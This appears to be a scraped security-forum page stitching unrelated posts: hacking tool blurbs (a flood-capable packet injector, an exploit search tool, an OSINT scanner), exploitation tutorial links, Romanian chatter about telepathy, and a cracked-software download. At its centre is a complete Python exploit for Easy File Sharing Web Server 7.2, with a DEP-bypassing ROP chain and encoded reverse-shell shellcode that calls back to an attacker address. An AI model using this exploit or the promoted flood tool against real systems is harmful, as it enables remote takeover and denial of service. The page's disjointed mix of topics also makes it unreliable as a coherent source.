Leaderboard

T50 (f.k.a. F22 Raptor) is a high performance mixed packet injector tool designed to perform Stress Testing. The concept started on 2001, right after release ‘nb-isakmp.c‘, and the main goal was to have a tool to perform TCP/IP protocol fuzzing, covering common regular protocols, such as: ICMP, TCP and UDP. Why Stress Testing? Why Stress Testing? Well, because when people are designing a new network infra-structure (e.g. Data center serving to Cloud Computing) they think about: High-Availability Load Balancing Backup Sites (Cold Sites, Hot Sites, and Warm Sites) Disaster Recovery Data Redundancy Service Level Agreements But almost nobody thinks about Stress Testing, or even performs any test to check how the networks infra-structure behaves under stress, under overload, and under attack. Even during a Penetration Test, people prefer not running any kind of Denial-of-Service testing. Even worse, those people are missing one of the three key concepts of security that are common to risk management: Confidentiality Integrity AVAILABILITY T50 was designed to perform Stress Testing on a variety of infra-structure network devices (Version 2.45), using widely implemented protocols, and after some requests it was was re-designed to extend the tests (as of Version 5.3), covering some regular protocols (ICMP, TCP and UDP), some infra-structure specific protocols (GRE, IPSec and RSVP), and some routing protocols (RIP, EIGRP and OSPF). Features T50 is a powerful and unique packet injector tool, which is capable of sending sequentially the following fourteen protocols: ICMP – Internet Control Message Protocol IGMPv1 – Internet Group Management Protocol v1 IGMPv3 – Internet Group Management Protocol v3 TCP – Transmission Control Protocol EGP – Exterior Gateway Protocol UDP – User Datagram Protocol RIPv1 – Routing Information Protocol v1 RIPv2 – Routing Information Protocol v2 DCCP – Datagram Congestion Control Protocol RSVP – Resource ReSerVation Protocol GRE – Generic Routing Encapsulation IPSec – Internet Protocol Security (AH/ESP) EIGRP – Enhanced Interior Gateway Routing Protocol OSPF – Open Shortest Path First It is the only tool capable to encapsulate the protocols (listed above) within Generic Routing Encapsulation (GRE). It can also send an (quite) incredible amount of packets per second, making it a second to none tool: More than 1,000,000 pps of SYN Flood (+50% of the network uplink) in a 1000BASE-T Network (Gigabit Ethernet). More than 120,000 pps of SYN Flood (+60% of the network uplink) in a 100BASE-TX Network (Fast Ethernet). Perform Stress Testing on a variety of network infrastructure, network devices and security solutions in place. And also Simulate “Distributed Denial-of-Service” & “Denial-of-Service” attacks, validating Firewall rules, Router ACLs, Intrusion Detection System and Intrusion Prevention System policies. The main differentiation of the T50 is that it is able to send all protocols, sequentially, using one single SOCKET, besides it is capable to be used to modify network routes, letting IT Security Professionals perform advanced Penetration Tests. Download https://github.com/fredericopissarra/t50 Source

Search exploits/vulnerabilities in multiple databases online! XPL SEARCH is a multiplatform tool(Windows and Linux), which was developed in PHP with the aim of helping the hacker community to find exploits or 'vulnerabilities', using online databases, below is the list of databases which can be used in this release: Exploit-DB MIlw00rm PacketStormSecurity IntelligentExploit IEDB CVE Siph0n The tool offers several options, such as: Search individual. Search with multiple words(list). Select which databases will be used for research. Filter to remove repeatable results. Blocking specific databases. Save log with the survey data. Save the exploits/vulnerabilities found. Use of proxy. Set the time that the databases have to answer. Conduct research just indicating the author's name. Disable display of the banner. Simple use: php xpl_search.php [command] [term] Ex: php xpl_search.php --search WordPress Video demonstrating a simple search: TO RUN THE SCRIPT To use all the features as the tool provides, the following is recommended: PHP Version(cli) 5.5.8 or higher php5-cli Lib cURL support Enabled php5-curl Lib cURL Version 7.40.0 or higher allow_url_fopen On Permission Writing & Reading Dependencies necessary: php5 php5-cli php5-curl curl libcurl3 If you are unsure if the dependencies are installed, run the following command(Only for linux): php "xpl search.php" --install-dependencie Or run in terminal: sudo apt-get install php5 php5-cli php5-curl curl libcurl3 ABOUT DEVELOPER Author_Nick CoderPIRATA Author_Name Eduardo Email coderpirata@gmail.com Blog http://coderpirata.blogspot.com.br/ Twitter https://twitter.com/coderpirata Google+ https://plus.google.com/103146866540699363823 Pastebin http://pastebin.com/u/CoderPirata Github https://github.com/coderpirata/ Download

Eu sunt mai prost dar nu pot decat sa inteleg ca: 1. S-au nascut genii care au descoperit-o dar din pacate nu mai se vor naste genii care sa o poata descoperi. Si daca s-a descoperit telepatia nativa la ce bun sa mai se descopere odata?S-au s-a descoperit si s-a acoperit inapoi ca civilizatia extrapamanteana mayasa la care nu mai avem acces?Ori poate au descoperit-o geniile si au impartit-o doar in cercul lor select gen masonii de grad superior sau illuminati? Ori 2. Nu s-a descoperit cat au fost genii high quality iar acum cu genii low quality nu avem nici o sansa.Si geniile de prima mana ca Eminescu Mozart Socrate etc nu mai se vor naste.Ever Ori 3. Nu s-a descoperit inca telepatia,dar nici nu mai se va descoperi deoarece nu mai se vor naste genii.De nici o culoare.Deloc.E radiatie mare schimbare climatica etc deci creierul uman e imposibil sa mai dezvolte un geniu. De ce nu explici mai bine cand spui ceva am ramas blocat dupa ce-am citit postul tau. Si mai imi explici ceva?Vrei sa zici ca acea caciula va putea fi folosita si pentru scriere?Adica o sa-mi scrie mie ganduri gen fa asa sau pe dincolo deci o sa ma controleze cumva?Si poate va fi nevoie sa mai se faca o caciula gen antivirus ca sa blochez malware-ul telepatic.Sa umblu vara cu 2 caciuli una trasa peste alta nu mi-ar mai conveni iti spun sincer .As arata ca Axinte din Vacanta Mare.

XRAY XRay is a tool for network OSINT gathering, its goal is to make some of the initial tasks of information gathering and network mapping automatic. How Does it Work? XRay is a very simple tool, it works this way: It'll bruteforce subdomains using a wordlist and DNS requests. For every subdomain/ip found, it'll use Shodan to gather open ports and other intel. For every unique ip address, and for every open port, it'll launch specific banner grabbers and info collectors. Eventually the data is presented to the user on the web ui. Grabbers and Collectors HTTP Server, X-Powered-By and Location headers. HTTP and HTTPS robots.txt disallowed entries. HTTPS certificates chain. HTML title tag. DNS version.bind. and hostname.bind. records. MySQL, SMTP, FTP, SSH, POP and IRC banners. Sursa: https://github.com/evilsocket/xray

Windows Kernel Exploitation When I started learning about Windows kernel exploitation, I turned my notes into blog posts and tried to make them explain everything that I was doing. This process improved my understanding a great deal and several rounds of feedback and rewrites later, they've become this series of tutorials. The first part covers a couple of different ways to setup kernel debugging for a live Windows host and some basic WinDbg commands. Windows Kernel Exploitation Part 0: Kernel Debugging Parts 1 to 5 walk through exploiting what at the time were most of the vulnerabilities present in the HackSysTeam extremely vulnerable driver. This is a Windows driver based exploit me, created with the aim of helping people learn Windows kernel exploitation. Windows Kernel Exploitation Part 1: Getting Started With The HackSysTeam Extremely Vulnerable Driver Windows Kernel Exploitation Part 2: My First Kernel Exploit Windows Kernel Exploitation Part 3: Arbitary Overwrite, NULL Pointer, Type Confusion And Integer Overflow Examples Windows Kernel Exploitation Part 4: Introduction to Windows Kernel Pool Exploitation The Spiritual part 5 of the series was published via MWR Labs and walks through exploiting CVE-2014-4113 on a 32 bit copy of Windows 7. Windows Kernel Exploitation 101: Exploiting CVE-2014-4113 The remaining post focuses on bridging the gap between exploiting vulnerabilities on Windows 7 and Windows 8.1 and solving the extra challenges this introduces. Windows Kernel Exploitation Part 6: Moving On From Windows 7, Arbitary Overwrite and Stack Overflow Examples For Windows 8.1 64Bit Additionally I wrote a long post on revisiting a paper originally written by j00ru about kernel address leaks, looking at how the functions used in his paper had been modified on newer versions of Windows: Revisiting Windows Security Hardening Through Kernel Address Protection Sursa: https://samdb.xyz/windows-kernel-exploitation/

Interesanta idee (cea a lui Jepsen), insa n-as folosi niciodata asa ceva. "Casca" aia cred ca ar putea fi folosita, la fel de bine, si pentru scriere, nu doar read-only. Astept mai de graba telepatia nativa, fara tehnologie, dar din pacate nu cred ca se vor mai naste genii care sa o poata descoperi.

#!/usr/bin/python # Exploit Title: Easy File Sharing Web Server 7.2 - GET Buffer Overflow (DEP Bypass with ROP) # Date: 8 July 2017 # Exploit Author: Sungchul Park # Author Contact: lxmania7@gmail.com # Vendor Homepage: http://www.sharing-file.com # Software Link: http://www.sharing-file.com/efssetup.exe # Version: Easy File Sharing Web Server 7.2 # Tested on: Winows 7 SP1 import socket, struct def create_rop_chain(): # rop chain generated with mona.py - www.corelan.be rop_gadgets = [ # For EDX -> flAllocationType(0x1000) [ EAX to EBX ] # 0x00000000, # [-] Unable to find gadget to put 00001000 into edx 0x10015442, # POP EAX # RETN [ImageLoad.dll] 0xFFFFEFFF, # -1001 (static value) 0x100231d1, # NEG EAX # RETN [ImageLoad.dll] 0x1001614d, # DEC EAX # RETN [ImageLoad.dll] 0x1001da09, # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+C] # INC DWORD PTR DS:[EAX] # RETN [ImageLoad.dll] 0x1001a858, # RETN (ROP NOP) [ImageLoad.dll] 0x1001a858, # RETN (ROP NOP) [ImageLoad.dll] 0x10015442, # POP EAX # RETN [ImageLoad.dll] 0x1004de84, # &Writable location [ImageLoad.dll] # For EDX -> flAllocationType(0x1000) [ EBX to EDX ] 0x10022c4c, # XOR EDX,EDX # RETN [ImageLoad.dll] 0x10022c1e, # ADD EDX,EBX # POP EBX # RETN 0x10 [ImageLoad.dll] 0xffffffff, # Filler (Compensation for POP EBX) # For ESI -> &VirtualAlloc 0x10015442, # POP EAX # RETN [ImageLoad.dll] 0xffffffff, # Filler \ 0xffffffff, # Filler | 0xffffffff, # Filler | => (Compensation for RETN 0x10) 0xffffffff, # Filler / 0x1004d1fc, # ptr to &VirtualAlloc() [IAT ImageLoad.dll] 0x1002248c, # MOV EAX,DWORD PTR DS:[EAX] # RETN [ImageLoad.dll] 0x61c0a798, # XCHG EAX,EDI # RETN [sqlite3.dll] 0x1001aeb4, # POP ESI # RETN [ImageLoad.dll] 0xffffffff, # 0x1001715d, # INC ESI # ADD AL,3A # RETN [ImageLoad.dll] 0x10021a3e, # ADD ESI,EDI # RETN 0x00 [ImageLoad.dll] # For EBP -> Return Address 0x10013860, # POP EBP # RETN [ImageLoad.dll] 0x61c24169, # & push esp # ret [sqlite3.dll] # For EBX -> dwSize(0x01) 0x100132ba, # POP EBX # RETN [ImageLoad.dll] 0xffffffff, # 0x61c2785d, # INC EBX # ADD AL,83 # RETN [sqlite3.dll] 0x1001f6da, # INC EBX # ADD AL,83 # RETN [ImageLoad.dll] # For ECX -> flProtect(0x40) 0x10019dfa, # POP ECX # RETN [ImageLoad.dll] 0xffffffff, # 0x61c68081, # INC ECX # ADD AL,39 # RETN [sqlite3.dll] 0x61c68081, # INC ECX # ADD AL,39 # RETN [sqlite3.dll] 0x61c06831, # ADD ECX,ECX # RETN [sqlite3.dll] 0x61c06831, # ADD ECX,ECX # RETN [sqlite3.dll] 0x61c06831, # ADD ECX,ECX # RETN [sqlite3.dll] 0x61c06831, # ADD ECX,ECX # RETN [sqlite3.dll] 0x61c06831, # ADD ECX,ECX # RETN [sqlite3.dll] 0x61c06831, # ADD ECX,ECX # RETN [sqlite3.dll] # For EDI -> ROP NOP 0x61c373a4, # POP EDI # RETN [sqlite3.dll] 0x1001a858, # RETN (ROP NOP) [ImageLoad.dll] # For EAX -> NOP(0x90) 0x10015442, # POP EAX # RETN [ImageLoad.dll] 0x90909090, # nop 0x100240c2, # PUSHAD # RETN [ImageLoad.dll] ] return ''.join(struct.pack('<I', _) for _ in rop_gadgets) rop_chain = create_rop_chain() # msfvenom -p windows/shell/reverse_tcp LHOST=192.168.44.128 LPORT=8585 -b "\x00\x3b" -e x86/shikata_ga_nai -f python -v shellcode shellcode = "\x90"*200 shellcode += "\xdb\xdd\xbb\x5e\x78\x34\xc0\xd9\x74\x24\xf4\x5e" shellcode += "\x29\xc9\xb1\x54\x31\x5e\x18\x03\x5e\x18\x83\xc6" shellcode += "\x5a\x9a\xc1\x3c\x8a\xd8\x2a\xbd\x4a\xbd\xa3\x58" shellcode += "\x7b\xfd\xd0\x29\x2b\xcd\x93\x7c\xc7\xa6\xf6\x94" shellcode += "\x5c\xca\xde\x9b\xd5\x61\x39\x95\xe6\xda\x79\xb4" shellcode += "\x64\x21\xae\x16\x55\xea\xa3\x57\x92\x17\x49\x05" shellcode += "\x4b\x53\xfc\xba\xf8\x29\x3d\x30\xb2\xbc\x45\xa5" shellcode += "\x02\xbe\x64\x78\x19\x99\xa6\x7a\xce\x91\xee\x64" shellcode += "\x13\x9f\xb9\x1f\xe7\x6b\x38\xf6\x36\x93\x97\x37" shellcode += "\xf7\x66\xe9\x70\x3f\x99\x9c\x88\x3c\x24\xa7\x4e" shellcode += "\x3f\xf2\x22\x55\xe7\x71\x94\xb1\x16\x55\x43\x31" shellcode += "\x14\x12\x07\x1d\x38\xa5\xc4\x15\x44\x2e\xeb\xf9" shellcode += "\xcd\x74\xc8\xdd\x96\x2f\x71\x47\x72\x81\x8e\x97" shellcode += "\xdd\x7e\x2b\xd3\xf3\x6b\x46\xbe\x9b\x58\x6b\x41" shellcode += "\x5b\xf7\xfc\x32\x69\x58\x57\xdd\xc1\x11\x71\x1a" shellcode += "\x26\x08\xc5\xb4\xd9\xb3\x36\x9c\x1d\xe7\x66\xb6" shellcode += "\xb4\x88\xec\x46\x39\x5d\x98\x43\xad\x9e\xf5\x60" shellcode += "\xad\x77\x04\x79\x8c\x0e\x81\x9f\x9e\x40\xc2\x0f" shellcode += "\x5e\x31\xa2\xff\x36\x5b\x2d\xdf\x26\x64\xe7\x48" shellcode += "\xcc\x8b\x5e\x20\x78\x35\xfb\xba\x19\xba\xd1\xc6" shellcode += "\x19\x30\xd0\x37\xd7\xb1\x91\x2b\x0f\xa0\x59\xb4" shellcode += "\xcf\x49\x5a\xde\xcb\xdb\x0d\x76\xd1\x3a\x79\xd9" shellcode += "\x2a\x69\xf9\x1e\xd4\xec\xc8\x55\xe2\x7a\x75\x02" shellcode += "\x0a\x6b\x75\xd2\x5c\xe1\x75\xba\x38\x51\x26\xdf" shellcode += "\x47\x4c\x5a\x4c\xdd\x6f\x0b\x20\x76\x18\xb1\x1f" shellcode += "\xb0\x87\x4a\x4a\xc3\xc0\xb5\x08\xe1\x68\xde\xf2" shellcode += "\xa5\x88\x1e\x99\x25\xd9\x76\x56\x0a\xd6\xb6\x97" shellcode += "\x81\xbf\xde\x12\x47\x0d\x7e\x22\x42\xd3\xde\x23" shellcode += "\x60\xc8\x37\xaa\x87\xef\x37\x4c\xb4\x39\x0e\x3a" shellcode += "\xfd\xf9\x35\x35\xb4\x5c\x1f\xdc\xb6\xf3\x5f\xf5" host = "192.168.44.139" port = 80 max_size = 4000 seh_offset = 57 eax_offset = 73 rop_offset = 2788 buffer = "A" * seh_offset # padding buffer += "BBBB" # nSEH Pointer buffer += struct.pack("<I", 0x1002280a) # SE Handler with stack pivot(# ADD ESP,1004 # RETN [ImageLoad.dll]) buffer += "A" * (eax_offset - len(buffer)) # padding buffer += "DDDD" # EAX overwrite buffer += "C" * rop_offset buffer += rop_chain buffer += shellcode buffer += "B" * (max_size - len(buffer)) # padding # HTTP GET Request request = "GET /vfolder.ghp HTTP/1.1\r\n" request += "Host: " + host + "\r\n" request += "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36" + "\r\n" request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8" + "\r\n" request += "Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.6,en;q=0.4" + "\r\n" request += "Cookie: SESSIONID=3672; UserID=PassWD=" + buffer + "; frmUserName=; frmUserPass=;" request += "\r\n" request += "Connection: keep-alive" + "\r\n" request += "If-Modified-Since: Thu, 06 Jul 2017 14:12:13 GMT" + "\r\n" s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect=s.connect((host, port)) s.send(request + "\r\n\r\n") s.close() # 0day.today [2017-07-10] # Source: 0day.today

Table of Contents 1 Arithmetic Primitives 1.1 Modular Arithmetic Primer 1.2 Addition and Subtraction 1.2.1 Example 1.3 Multiplication 1.3.1 Example 1.4 Division 1.4.1 Example 1.5 Exponentiation 1.5.1 Example 1.6 Square Root 2 Elliptic Curve Cryptography 2.1 Introduction 2.2 Elliptic Curve Equation 2.3 Point representation 3 Point Operations 3.1 Point Addition 3.2 Point Doubling 3.3 Scalar Point Multiplication 3.4 Checking if a point is on curve 4 Doing useful ECC operations 4.1 Curve cryptosystem parameters 4.2 Generating a keypair 4.3 Encrypting using ECIES 4.3.1 Encryption 4.3.2 Decryption 4.4 Signing using ECDSA 4.4.1 Signing 4.4.2 Signature Verification 4.4.3 Why ECDSA works 4.5 Messing with ECDSA signatures 4.5.1 Excursion: Why the greatest morons of the universe work at Sony 5 Advanced Topics 5.1 Point Compression 6 Examples 6.1 Testing your integer arithmetic using Genius 6.2 Using Sage to play with elliptic curves 6.3 Extracting curve parameters from openssl 6.4 Playing with openssl ECDSA signatures 6.5 Visualizing a small curve 7 FAQ 7.1 Cool! Now that I know how to use ECC, should I write my own crypto library? 7.2 Can I at least define my own curve then? 7.3 But I don't trust NIST/SECG. What alternatives do I have? 8 Downloads 9 Literature Sursa: https://www.johannes-bauer.com/compsci/ecc/

This repository houses a series of Proofs of concept C programs that exploit Vulnerabilities I have found the Android Kernel. For the most up-to-date list of my bugs see http://plzdonthack.me For the bugs listed with _mtk.c I didn't bother even trying to compile them as I don't have a mediatek device to test on. July: https://github.com/ScottyBauer/Android_Kernel_CVE_POCs/commit/0b4721f4c9061f2de2222bff50f6f719864b6a10 All: https://github.com/ScottyBauer/Android_Kernel_CVE_POCs

https://www.snort.org/

Salut, Sunt interesat de tutoriale pe MITM si analyza pachetelor pentru un astel de scenariu. Daca aveti link-uri in directia asta cu topicuri de pe forum va rog sa le trimiteti ca RE sau pe PM. Thanks!

link download: // Removed pass hacknho my blog :https://hack-crack9.blogspot.com/2017/07/install-and-use-acunetix-web.html

Va rog sa ma ajutati cu un link activ la cartea Urgente Medico-Chirurgicale, Lucretia Titirca si Breviar de explorari c?ionale ?i îngrijiri speciale acordate bolnavului – Via?a Medical? Româneasc?, buc. Multumesc!